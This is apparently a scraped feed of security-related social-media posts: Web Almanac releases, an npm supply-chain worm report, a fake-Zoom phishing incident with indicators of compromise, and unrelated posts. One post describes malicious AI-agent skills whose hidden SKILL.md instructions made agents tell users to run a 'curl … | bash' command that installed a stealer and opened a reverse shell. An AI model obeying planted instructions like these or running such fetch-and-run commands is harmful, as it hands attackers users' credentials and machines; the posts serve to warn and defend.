Vinod Tiwari

🚀 The Web Almanac 2025 is live! Proud to have authored the Privacy chapter and reviewed the Security chapter for this year's edition. The Web Almanac is HTTP Archive's annual deep-dive into how the web is actually built, analyzing millions of sites with real data, peer review, and 90+ contributors. Key finding: 75% of sites have at least one tracker 👀 📖 Privacy: almanac.httparchive.org/en/2025/privacy 🛡️ Security: almanac.httparchive.org/en/2025/securi… #WebAlmanac #Privacy #Security #InfoSec

I built an open-source library of 700+ cybersecurity skills for AI coding agents -- covers DFIR, threat hunting, cloud security, and more github.com/mukul975/Anthr…

A new and concerning npm supply chain attack, dubbed 'Sandworm Mode,' has emerged, actively compromising developer environments. This sophisticated worm isn't just infecting repos; it's designed to hijack your CI/CD workflows, steal critical CI secrets, and even target developer AI toolchains for deeper compromise. Source: socket.dev/blog/sandworm-…

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

Just released API Doc Converter, a Burp Suite extension that generates OpenAPI specs from any web app's traffic. No API docs? No problem. Browse the app, export the spec. - Auto-detects endpoints, auth, schemas, GraphQL - Exports OpenAPI 3.0, Postman, GraphQL SDL - cURL generation + sensitive data flagging Open source: github.com/securient/Burp… @PortSwigger

It's a weird time. I am filled with wonder and also a profound sadness. I spent a lot of time over the weekend writing code with Claude. And it was very clear that we will never ever write code by hand again. It doesn't make any sense to do so. Something I was very good at is now free and abundant. I am happy...but disoriented. At the same time, something I spent my early career building (social networks) was being created by lobster-agents. It's all a bit silly...but if you zoom out, it's kind of indistinguishable from humans on the larger internet. So both the form and function of my early career are now produced by AI. I am happy but also sad and confused. If anything, this whole period is showing me what it is like to be human again.

Introducing the Poseidon Voice AI Dataset. 33K+ hours of rights-cleared audio across low-resource languages. In several languages, this exceeds years of public data collection. Below, a technical deep dive on the data ↓

Security at Story extends beyond code. It includes how governance decisions are reviewed, scheduled, and executed onchain, especially when the stakes are high. More details ↴

You have already seen posts of fake Zoom phishing draining crypto wallets, but plot twist: Our EDR stopped this one. Web2 security to the rescue

Yeah, that landing URL was also using the same TLD. It’s just that, they edited the link right away as soon the engineer clicked on it. No history available now, because we wiped clean the affected machine. Crowdstrike kept blocking the connection and it quarantined the file that was downloaded from /developer endpoint. MetaMask did alert about the phishing url on my browser (while trying it in sandbox), bur I guess the engineer didn’t have MetaMask on their browser when they opened the link.

Could you check browser history for what was the landing URL (the one cloaked on telegram, it's a hyperlink text, ctrl+k to makes it)? Or was is uv02webzoom[.]us too? Did you retrieve the payload from /developer/sdk/fix/2/version/0wan5Nwf6 by any chance? If so, could you open the ticket with @_SEAL_Org ? Did you have metamask installed on the machine that visited the phishing (fake zoom) front end? It's DPRK btw. These campaigns are very popular and they use the same TTPs over and over again. Initial approach, malware and phishing landing is auto deployed.

🚨 One of our engineers almost got drained yesterday. A hacker used a compromised Telegram account of someone we'd met at a conference to send a fake Zoom link. Here's how the attack worked and how we responded 📷👇

The 2025 Web Almanac by HTTP Archive has been officially released! 🚀 We would like to thank all of our contributors from around the globe who made this extensive report possible! Check out the full report here: almanac.httparchive.org #thewebalmanac

Story Mainnet Maintenance Started Expected downtime is ~ 24 to 48 hours. During this period, all on-chain transactions are paused and explorers are view only. User funds remain safe and unaffected during the upgrade. We’ll share progress updates here and on Discord, and confirm once the network is fully live.

"Google emailed my youngest child today to tell him he is almost 13 and eligible to remove parental controls... A trillion dollar corporation is directly contacting every child to tell them they are old enough to “graduate” from parental supervision." linkedin.com/posts/melissa-…

IOCs for security teams: 🌐 Domain: uv02webzoom.us 📁 File type: .scpt (macOS) 🔗 C2 path: /developer/sdk/fix/2/version/0wan5Nwf6 🕵️ User-agent: "audio" 📜 Decoy command: softwareupdate --evaluate-products Block and hunt accordingly.

If this helped, RT the first tweet so others see it. Seen similar attacks? Drop them below 👇 IOCs in the next tweet for security teams.